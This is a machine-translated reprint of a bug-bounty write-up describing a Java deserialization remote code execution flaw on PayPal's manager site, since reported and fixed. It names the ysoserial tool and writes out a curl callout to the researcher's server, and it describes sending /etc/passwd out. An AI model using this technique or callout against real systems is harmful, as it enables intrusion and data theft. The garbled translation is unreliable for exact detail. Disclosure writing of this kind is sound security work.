PayPal remote code execution vulnerability-vulnerability warning-the black bar safety net

2016-01-26T00:00:00
ID MYHACK58:62201671416
Type myhack58
Reporter 佚名
Modified 2016-01-26T00:00:00

Description

! /Article/UploadPic/2016-1/2016126182812936.jpg

In 2 0 1 5 years 1 2 months,I in the PayPal Business Site(manager.paypal.com)found a serious vulnerability,this vulnerability exist,so that I can through unsafe JAVA deserialize the object,in the PayPal website, the server on the remote using the shell command,and get access to the production database permissions. I will quickly this flaw to PayPal security team for reporting this vulnerability then it was soon solved.

Specific details:

In the PayPal website forsecurity testing, I is an unusual Annex to the form parameters“oldForm”attracted,this parameter after the base64-decoded,it looks more complicated.

! /Article/UploadPic/2016-1/2 0 1 6 1 2 6 1 8 2 8 1 2 1 3 0. png

After some research,I realized that this is the one without any marking of the java serialized object,it by the application process. This means that you can send to the server any of the existing categories of the serialized object,and“readObject”(or“readResolve”)。 If you want to take advantage of this vulnerability,you need to be in the“classpath”to find a suitable category,one can serialize and having fun(just stand in the development and utilization point of view)of the built-in“readObject”programme. You can be in the recent byFoxGlove Securitythe security team made a post,learn to this technology. A year ago,Chris Frohoff (@frohoff)and Gabriel Lawrence (@gebl)did a great job,they are in the Apache Common Collections library, find the appropriate class,which makes them may be for remote code manipulation,and also in their github pageon the home page announced the“ysoserial”payload generation tool.

The development and utilization:

I quickly downloaded this tool,and then generate a simple payload,and to my own server by executing“curl x.s.artsploit.com/paypal”shell command,send the DNS and HTTP request:

! /Article/UploadPic/2016-1/2 0 1 6 1 2 6 1 8 2 8 1 2 1 5 6. png

Then I to program the server to send that in“oldFormData”parameter in base64 encryption of the payload,after I was impressed,when from the PayPal network request in my NGINX access log appears:

! /Article/UploadPic/2016-1/2 0 1 6 1 2 6 1 8 2 8 1 3 2 9 5. png

I realize I may be in the manager. paypal. com web page on the server to perform any of the operation command,in addition,I can establish a background connection,connect to my favorite server,for example,to upload and execute a backdoor. The result is,I can get the manager. paypal. com application the use of a production database access rights.

Instead,I just read the“/etc/passwd” file,by sending it to my server,and it is attributed to the vulnerability of the illustration:

! /Article/UploadPic/2016-1/2 0 1 6 1 2 6 1 8 2 8 1 3 4 0 9. png

I also recorded a video,on how to re-generate the vulnerability,and sends it to the PayPal security team for reporting.

After that,I In manager. paypal. com program found in many other endpoints,they use the same serialized object,can also be utilized.

About a month later,PayPal gave me a bonus,to reward me for this on the bug report,but as far as I know,another researcher Mark Litchfield in 2 0 1 5 year 1 2 on 1 1, also similar to the vulnerability report,than I am early for two days. But anyway,PayPal decided to give me a bonus,I respect their decision.